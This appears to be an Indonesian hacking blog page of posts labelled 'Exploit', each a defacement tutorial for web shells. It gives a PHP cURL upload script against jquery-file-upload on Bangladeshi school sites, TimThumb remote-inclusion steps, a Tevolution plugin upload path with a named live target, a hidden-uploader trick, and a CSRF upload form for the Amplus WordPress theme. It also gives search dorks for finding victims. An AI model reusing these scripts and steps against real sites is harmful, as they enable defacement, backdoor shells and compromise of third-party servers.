Showing posts with label Exploit. Show all posts
  • Deface website sekolah Bangladesh

    hallo.

    kali ini ane pengen share cara deface school Bangladesh.
    ya kyk bug balitbang lah kalo di indo.

    Bugnya ada di plugin jquery-file-upload.
    yaudah langsung aja.

    dork: Developed by exdmania

    script:

     <?php
    $file = "kkk.htm"; //shell ataupun script deface
    $post = array("files[]" => "@$file",
    );
    $ch2 = curl_init ("http://site.com/assets/super_admin/vendor/jquery-file-upload/server/php/");
    curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt ($ch2, CURLOPT_POST, 1);
    curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
    $data = curl_exec ($ch2);
    echo $data."\n\n\n";
    ?>
    POC:

    hasil:
    /assets/super_admin/vendor/jquery-file-upload/server/php/files/




  • Tutorial Deface Dengan TimThumb 1.14

    Okeh sebelum belajar exploit ini saya mau ngejelasin bahwa timthumb ini adalah suatu bug dimana terdapat di semua website wordpress , lebih tepatnya terdapat pada " theme / tema " suatu website ,,,
    Contoh : themes/optimizepress/timthumb.php < nah kalo ada bacaan seperti " 
     
    no image specified
    Query String : 
    TimThumb version : 1.19 
     
    berarti vuln ;) ,, nah yang harus kamu ketahui lagi itu adalah TimThumb version . 
    Nah jadi target yang bisa kita exploitasi itu timthumb version 1.14 sampai dengan 
    1.32 ,, Udah ngerti kan ? :) kalo belum ngerti liat aja tutorialnya :) ,, Yuk TKP .. 
     
    Alat dan Bahan : 
    1. Subdomain yang terintegrasi website berikut 
       : picasa.com
       : blogger.com
       : flixr.com 
     
    sebenarnya ada 5 tapi aku gk hafal U,u ,, contoh " flxr.com.namawebsitekamu.com/shell.php "
    , Nah sebelumnya kamu musti upload dulu shell di subdomain kamu yang letaknya di directory
    public_html / httpdocs / www / dan macam² .. 
      
    2. Otak dan pantang menyerah ;) .. 

    Exploit : 
    1. Kali ini saya dah punya target sendiri ,, lihat gambar .. 
    2. Nah kemudian kalian tambahkan subdomain kalian di ahkir url seperti ini " ?src=http://www.flixr.com.subdomainkamu.com/shell.php " < begitu mas ;) ,, kurang jelas ? lihat gambar .. 
    3. Tuh liat gambarnya kalo gitu dah " Game Over " namanya ;) .. tinggal buka shellnya aja kan di situ ada tulisan " Unable to open image :" kalo gitu skrng tinggal buka shellnya , caranya copy md5 yang tadi contoh :
    " /cache/c89de71219ef668b7642e43e04d5d4df.php " masih kurang jelas ? liat gambar ..
    4. Nah skrng kita copas ke urlnya jadi " http://namatarget.com/wp-content/themes/optimizepress/cache/c89de71219ef668b7642e43e04d5d4df.php "  , lihat di bawah ,,
    5. Selesai deh :D ,,, nah itu kalo ane gk upload shell di subdomainnya tapi upload uploader aja jadi ky gitu ,,
    hehe sory yak uploadernya punya pak deb~X ,,


    Source : Extreme Crew 
    post diambil dari SINI
  • wordpress Plugins Tevolution

    Dork :inur:plugins/tevolution < Bisa di kembangin
    Exploit:wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
    Array Filedata , ataugak pake mass exploiternya agus 
    localheart.esy.es/public_html/public_html/tools/ <auto exploit

    Bypass shell , shell.php4 , 
    Shell akses / wp-content/uploads/2016/05/shell.php


    Btw di site itu kalo search di google image ada yang tevolution-directory , atau sebagainya langsung exploit aja pake exploit di atas 


    Author : Stupidc0de

    GreetZ : Sanjungan jiwa - indoxploit

    http://ezeebe.com/wp-content/plugins/Tev...upload.php < Live target
    Vuln site : BLANK!


    Sumber : Post diambil dari Forum IndoXploit yang post oleh Condet6etar
  • Hidden Uploader

    - intitleTongueayPal Account Checker
    - intitleTongueayPal Email Valid Checker
    Exploit : /function.php?76=browser
     Kalo emang ada hidden uploadernya nanti bakal muncul uploader disitu , 
    Shell aksesnya , site.coli/shell.php / site.co.li/path/shell.php

    Btw path itu yang biasa ada didepan sitenya , jembut/wp/ < wpnya path dari wordpress , jadi kalo mau exploit didepan pathnya 

    Sekian dan terimagaji



    Sumber : Post diambil dari Forum IndoXploit yang post oleh Condet6etar
  • Wordpress Amplus Themes CSRF File Upload Vulnerability

    #Title : Wordpress Amplus Themes CSRF File Upload Vulnerability
     
    #Author : DevilScreaM
     
    #Date : 11/17/2013 - 17 November 2013
     
    #Category : Web Applications
     
    #Type : PHP
     
    #Vendor : http://themeforest.net
     
    #Download : http://themeforest.net/item/amplus-responsive-multilingual-wordpress-theme/
     
    #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
         Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
     
    #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
     
    #Tested : Mozila, Chrome, Opera -> Windows & Linux
     
    #Vulnerabillity : CSRF
     
    #Dork :
     
    inurl:wp-content/themes/amplus
     
     
    CSRF File Upload Vulnerability
     
    Exploit & POC :
     
    http://site-target/wp-content/themes/amplus/functions/upload-handler.php
     
    Script :
     
    <form enctype="multipart/form-data"
    action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php" method="post">
    Your File: <input name="uploadfile" type="file" /><br />
    <input type="submit" value="upload" />
    </form>
     
     
    File Access :
     
    http://site-target/uploads/[years]/[month]/your_shell.php
     
    Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

  • Nisekoi Template Designed by Johanes Djogan

    ©2016 - ReDesigned By Ani-Sudo